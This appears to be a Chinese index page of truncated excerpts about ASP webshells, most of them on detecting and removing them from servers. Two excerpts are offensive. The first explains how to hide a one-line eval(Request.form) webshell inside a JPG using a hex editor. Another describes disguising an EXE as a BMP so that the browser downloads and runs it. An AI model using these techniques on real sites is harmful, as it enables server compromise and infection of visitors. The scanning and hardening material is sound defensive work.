1.名称：如何制作图片ASP木马 （可显示图片） 建一个asp文件，内容为<!--＃i nclude file="ating.jpg"--> 找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为 了运行成功，还要搜索<%和％>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#...

＋-----------------＋｜淘特ASP木马扫描器｜＋-----------------＋　　本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件，查出可疑的木马程序。系统采用扫描程序与病毒库分离的形式，以后升级只需像杀毒软件那样升级病毒库就可以了。目前可以查杀所有流行的ASP木马程序。　　系统提供了全站扫描、按文件夹和指定文件扫描三种扫描方式，如果网站文件比较少的话，推荐使用"全站扫描",如果文件比较多，推荐使用按文件夹扫描。扫描过程，系统会记录被扫描过的文件列表，同时对怀疑是木马程序的文件以列表的形式展现，为了便于比较最近有可能被上传过ASP木马程序，系统...

可以在线查找空间里的asp木马[code]<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%><%’设置密码PASSWORD = "jb51net"dim Reportif request.QueryString("act")="login" then    if request.Form("pwd") = PASSWORD then session("pig")=1end if%>&l...

由于ASP它本身是服务器提供的一项服务功能，特别是最近由dvbbs的upfile文件出现漏洞以来，其高度的隐蔽性和难查杀性，对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除，为网管人员提出了更高的技术要求.       　　几个大的程序全部被发现存在上传漏洞，小程序更是不计其数，让asp木马一下占据了主流，得到广泛的使用，想必如果你是做服务器的话，一定为此头疼不止吧，特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历，事后除了对这种行径深恶痛绝外，许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是...

首先说明这不是什么新的东西,但最近有人说我们没有,那就随便写编文章放上来了,大家自己试验一下. 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.　然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的javascript脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放...

如果您的服务器正在受ASP木马的困扰，那么希望这篇文章能帮您解决您所面临的问题。　　目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作。　　一、使用FileSystemObject组件　　FileSystemObject可以对文件进行常规操作　　可以通过修改注册表，将此组件改名，来防止此类木马的危害。　　HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字，如：改为FileSystemObject_ChangeName　　自己以后调用的时候使用这个就可以正常调用此组件了　　也要将clsid值也改一下　　HKEY_CLASSES...

关于查ASP木马的程序，记得半年前在八进制发了一个测试版（具体的URL:http://forum.eviloctal.com/read-htm-tid-19665.html），得到很多朋友的指导，学到了很多东西，非常感谢他们。现在我发的这个升级版，修补了以前的bug，加入了对一些组件写文件函数的检测，更加趋于完美了，个人认为想绕过去有点难度哦。这回的默认密码是security当然啦，哈哈，lake2“比武招亲”，欢迎各位朋友提出绕过检测的马马来，一经证实，lake2将把我自己写的某ASP木马“嫁”给他^_^ 特别有创意的，送你一个我最新弄出来的脚本，具体嘛，嘿嘿，到时候就知道啦。战书...